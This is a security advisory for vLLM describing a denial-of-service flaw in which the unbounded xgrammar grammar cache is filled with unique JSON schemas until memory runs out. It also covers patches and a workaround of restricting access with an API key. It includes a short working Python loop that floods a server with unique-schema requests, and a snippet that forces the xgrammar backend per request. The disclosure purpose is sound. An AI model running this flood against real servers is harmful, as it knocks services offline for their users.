GHSA-hf3c-wxg2-49q9: vLLM vulnerable to Denial of Service by abusing xgrammar cache
Impact
This report highlights a vulnerability in xgrammar, the library used by vLLM's structured output feature. The corresponding xgrammar advisory is here: https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
The xgrammar library is the default backend vLLM uses to support structured output (a.k.a. guided decoding). xgrammar maintains a built-in, in-memory cache of compiled grammars that cannot be disabled, and it is reachable by default through the OpenAI-compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests, each with a unique schema, causing a new entry to be added to the cache for every request. Because the cache is unbounded, this can result in a Denial of Service by consuming all of the system's RAM.
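As a rough sketch, the attack pattern looks like the following (the server address, model name, and schema contents are placeholders; guided_json is the structured-output parameter accepted by vLLM's OpenAI-compatible completions endpoint). Every iteration submits a schema the server has never seen, so xgrammar compiles and caches a fresh grammar each time:

```python
import requests

# Hypothetical target: a vLLM OpenAI-compatible server with structured
# output enabled. The URL and model name are placeholders.
URL = "http://localhost:8000/v1/completions"

for i in range(100_000):
    # A trivially unique schema per request: only the property name changes.
    schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }
    requests.post(URL, json={
        "model": "my-model",
        "prompt": "x",          # a very short prompt keeps each request cheap
        "max_tokens": 1,
        "guided_json": schema,  # each unique schema adds a new cache entry
    })
```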
Note that even if vLLM is configured to use a different backend by default, it is still possible to select xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine, as sketched below. This per-request choice is not available when using the V1 engine.
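A minimal sketch of that per-request override, assuming the openai Python client and placeholder server and model names:

```python
from openai import OpenAI

# Placeholders: adjust base_url and model to the target deployment.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

client.completions.create(
    model="my-model",
    prompt="x",
    max_tokens=1,
    extra_body={
        "guided_json": {"type": "object"},
        # Forces the xgrammar backend for this request only. On the V0
        # engine this overrides the server default; the V1 engine does
        # not honor a per-request backend choice.
        "guided_decoding_backend": "xgrammar",
    },
)
```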
Patches
- https://github.com/vllm-project/vllm/pull/16283
Workarounds
There is no way to work around this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI-compatible API server. One way to do that is sketched below.
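As one deployment sketch (an access restriction, not a fix for the underlying cache behavior), the server can be started with vLLM's --api-key option so that only clients presenting the matching key are served. The key, address, and model below are placeholders:

```python
from openai import OpenAI

# Assumes the server was launched with a matching key, e.g.:
#   vllm serve <model> --api-key s3cret-key
# Requests without this key are rejected before reaching the engine.
client = OpenAI(
    base_url="http://localhost:8000/v1",
    api_key="s3cret-key",  # placeholder; must match the server's --api-key
)
```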
References
- https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
- https://github.com/vllm-project/vllm/security/advisories/GHSA-hf3c-wxg2-49q9
- https://github.com/vllm-project/vllm/pull/16283
- https://github.com/vllm-project/vllm/commit/cb84e45